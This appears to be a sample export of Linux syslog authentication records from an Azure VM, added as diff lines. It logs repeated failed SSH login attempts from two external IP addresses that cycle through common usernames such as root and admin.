+11946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:24,UbuntuDevEnv,2019-06-26 01:41:23,auth,UbuntuDevEnv,info,Invalid user bsd from 131.108.48.151 port 38106,89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd,131.108.48.1,38106,,
+11947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:24,UbuntuDevEnv,2019-06-26 01:41:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:24,UbuntuDevEnv,2019-06-26 01:41:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:26,UbuntuDevEnv,2019-06-26 01:41:25,auth,UbuntuDevEnv,info,Failed password for invalid user bsd from 131.108.48.151 port 38106 ssh2,89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd,131.108.48.1,38106,,
+11950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:26,UbuntuDevEnv,2019-06-26 01:41:26,auth,UbuntuDevEnv,info,Disconnected from invalid user bsd 131.108.48.151 port 38106 [preauth],89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd,131.108.48.1,38106,,
+11951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:41:26,UbuntuDevEnv,2019-06-26 01:41:26,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 38106:11: Bye Bye [preauth],89497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,38106,,
+11952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:02,UbuntuDevEnv,2019-06-26 01:42:02,auth,UbuntuDevEnv,info,Invalid user pilot from 51.77.140.111 port 55080,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pilot,51.77.140.1,55080,,
+11953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:02,UbuntuDevEnv,2019-06-26 01:42:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:02,UbuntuDevEnv,2019-06-26 01:42:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:04,UbuntuDevEnv,2019-06-26 01:42:03,auth,UbuntuDevEnv,info,Failed password for invalid user pilot from 51.77.140.111 port 55080 ssh2,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pilot,51.77.140.1,55080,,
+11956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:04,UbuntuDevEnv,2019-06-26 01:42:03,auth,UbuntuDevEnv,info,Disconnected from invalid user pilot 51.77.140.111 port 55080 [preauth],89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pilot,51.77.140.1,55080,,
+11957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:42:04,UbuntuDevEnv,2019-06-26 01:42:03,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55080:11: Bye Bye [preauth],89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55080,,
+11958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:20,UbuntuDevEnv,2019-06-26 01:43:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151  user=root,89908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,131.108.48.1,,0,
+11959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:23,UbuntuDevEnv,2019-06-26 01:43:22,auth,UbuntuDevEnv,info,Failed password for root from 131.108.48.151 port 46679 ssh2,89908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,46679,,
+11960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:23,UbuntuDevEnv,2019-06-26 01:43:23,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 46679:11: Bye Bye [preauth],89908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,46679,,
+11961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:23,UbuntuDevEnv,2019-06-26 01:43:23,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 131.108.48.151 port 46679 [preauth],89908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,131.108.48.1,46679,,
+11962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:27,UbuntuDevEnv,2019-06-26 01:43:27,auth,UbuntuDevEnv,info,Invalid user ginger from 51.77.140.111 port 43806,89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ginger,51.77.140.1,43806,,
+11963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:27,UbuntuDevEnv,2019-06-26 01:43:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:27,UbuntuDevEnv,2019-06-26 01:43:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:29,UbuntuDevEnv,2019-06-26 01:43:29,auth,UbuntuDevEnv,info,Failed password for invalid user ginger from 51.77.140.111 port 43806 ssh2,89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ginger,51.77.140.1,43806,,
+11966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:29,UbuntuDevEnv,2019-06-26 01:43:29,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 43806:11: Bye Bye [preauth],89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,43806,,
+11967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:43:29,UbuntuDevEnv,2019-06-26 01:43:29,auth,UbuntuDevEnv,info,Disconnected from invalid user ginger 51.77.140.111 port 43806 [preauth],89938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ginger,51.77.140.1,43806,,
+11968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:44:56,UbuntuDevEnv,2019-06-26 01:44:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111  user=root,90256,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,51.77.140.1,,0,
+11969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:44:58,UbuntuDevEnv,2019-06-26 01:44:58,auth,UbuntuDevEnv,info,Failed password for root from 51.77.140.111 port 60768 ssh2,90256,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,60768,,
+11970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:44:58,UbuntuDevEnv,2019-06-26 01:44:58,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 60768:11: Bye Bye [preauth],90256,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,60768,,
+11971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:44:58,UbuntuDevEnv,2019-06-26 01:44:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 51.77.140.111 port 60768 [preauth],90256,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,51.77.140.1,60768,,
+11972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:20,UbuntuDevEnv,2019-06-26 01:45:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:20,UbuntuDevEnv,2019-06-26 01:45:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:20,UbuntuDevEnv,2019-06-26 01:45:19,auth,UbuntuDevEnv,info,Invalid user admin from 131.108.48.151 port 55241,90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,131.108.48.1,55241,,
+11975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:22,UbuntuDevEnv,2019-06-26 01:45:22,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 131.108.48.151 port 55241 ssh2,90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,131.108.48.1,55241,,
+11976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:23,UbuntuDevEnv,2019-06-26 01:45:22,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 55241:11: Bye Bye [preauth],90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,55241,,
+11977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:45:23,UbuntuDevEnv,2019-06-26 01:45:22,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 131.108.48.151 port 55241 [preauth],90367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,131.108.48.1,55241,,
+11978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:22,UbuntuDevEnv,2019-06-26 01:46:21,auth,UbuntuDevEnv,info,Invalid user zenenko from 51.77.140.111 port 49494,90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,51.77.140.1,49494,,
+11979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:22,UbuntuDevEnv,2019-06-26 01:46:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:22,UbuntuDevEnv,2019-06-26 01:46:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:23,UbuntuDevEnv,2019-06-26 01:46:23,auth,UbuntuDevEnv,info,Failed password for invalid user zenenko from 51.77.140.111 port 49494 ssh2,90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,51.77.140.1,49494,,
+11982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:24,UbuntuDevEnv,2019-06-26 01:46:23,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49494:11: Bye Bye [preauth],90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49494,,
+11983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:46:24,UbuntuDevEnv,2019-06-26 01:46:23,auth,UbuntuDevEnv,info,Disconnected from invalid user zenenko 51.77.140.111 port 49494 [preauth],90646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,51.77.140.1,49494,,
+11984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:21,UbuntuDevEnv,2019-06-26 01:47:20,auth,UbuntuDevEnv,info,Invalid user ry from 131.108.48.151 port 63788,90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ry,131.108.48.1,63788,,
+11985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:21,UbuntuDevEnv,2019-06-26 01:47:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:21,UbuntuDevEnv,2019-06-26 01:47:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+11987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:23,UbuntuDevEnv,2019-06-26 01:47:22,auth,UbuntuDevEnv,info,Failed password for invalid user ry from 131.108.48.151 port 63788 ssh2,90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ry,131.108.48.1,63788,,
+11988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:23,UbuntuDevEnv,2019-06-26 01:47:22,auth,UbuntuDevEnv,info,Disconnected from invalid user ry 131.108.48.151 port 63788 [preauth],90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ry,131.108.48.1,63788,,
+11989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:23,UbuntuDevEnv,2019-06-26 01:47:22,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 63788:11: Bye Bye [preauth],90850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,63788,,
+11990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:48,UbuntuDevEnv,2019-06-26 01:47:48,auth,UbuntuDevEnv,info,Invalid user demo from 51.77.140.111 port 38220,90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,51.77.140.1,38220,,
+11991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:48,UbuntuDevEnv,2019-06-26 01:47:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:48,UbuntuDevEnv,2019-06-26 01:47:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:50,UbuntuDevEnv,2019-06-26 01:47:49,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 51.77.140.111 port 38220 ssh2,90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,51.77.140.1,38220,,
+11994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:50,UbuntuDevEnv,2019-06-26 01:47:49,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38220:11: Bye Bye [preauth],90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38220,,
+11995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:47:50,UbuntuDevEnv,2019-06-26 01:47:49,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 51.77.140.111 port 38220 [preauth],90950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,51.77.140.1,38220,,
+11996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:16,UbuntuDevEnv,2019-06-26 01:49:15,auth,UbuntuDevEnv,info,Invalid user zas1024 from 51.77.140.111 port 55182,91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zas1024,51.77.140.1,55182,,
+11997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:16,UbuntuDevEnv,2019-06-26 01:49:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:16,UbuntuDevEnv,2019-06-26 01:49:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+11999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:18,UbuntuDevEnv,2019-06-26 01:49:17,auth,UbuntuDevEnv,info,Failed password for invalid user zas1024 from 51.77.140.111 port 55182 ssh2,91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zas1024,51.77.140.1,55182,,
+12000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:18,UbuntuDevEnv,2019-06-26 01:49:17,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55182:11: Bye Bye [preauth],91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55182,,
+12001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:18,UbuntuDevEnv,2019-06-26 01:49:17,auth,UbuntuDevEnv,info,Disconnected from invalid user zas1024 51.77.140.111 port 55182 [preauth],91338,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zas1024,51.77.140.1,55182,,
+12002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:20,UbuntuDevEnv,2019-06-26 01:49:19,auth,UbuntuDevEnv,info,Invalid user git_user from 131.108.48.151 port 15850,91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,15850,,
+12003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:20,UbuntuDevEnv,2019-06-26 01:49:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:20,UbuntuDevEnv,2019-06-26 01:49:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 01:49:22,UbuntuDevEnv,2019-06-26 01:49:21,auth,UbuntuDevEnv,info,Failed password for invalid user git_user from 131.108.48.151 port 15850 ssh2,91346,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,131.108.48.1,15850,,
